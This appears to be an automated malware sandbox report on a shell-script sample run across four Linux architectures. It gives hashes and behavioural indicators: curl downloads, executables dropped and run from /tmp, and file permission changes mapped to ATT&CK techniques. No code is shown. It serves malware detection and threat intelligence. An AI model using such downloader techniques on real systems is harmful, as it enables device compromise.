Analysis
- max time kernel: 65s
- max time network: 67s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 28/10/2024, 02:19
Static task
static1
Behavioral task
behavioral1
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsel-20240611-en
General
- Target: 2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
- Size: 10KB
- MD5: a5a9f72ca25763058aacf1994a85b616
- SHA1: 748843de754f9484c22ebf1e32e5894d70f4859f
- SHA256: 2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86
- SHA512: 47f9975ff7556dfa8ceecd5af09a40a67e07ddd1478bfee1cbe1189d252b5fe35d0a098fa94c5aa6aa5694f33bb0b776685ddd59772184b7d42fa2a5d78e6cea
- SSDEEP: 192:oPTGhYwtdd5GFV2ER73e7jb18jgZPTGhYwDd5GFVW73e7jVIU:QgbEo18Uftx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97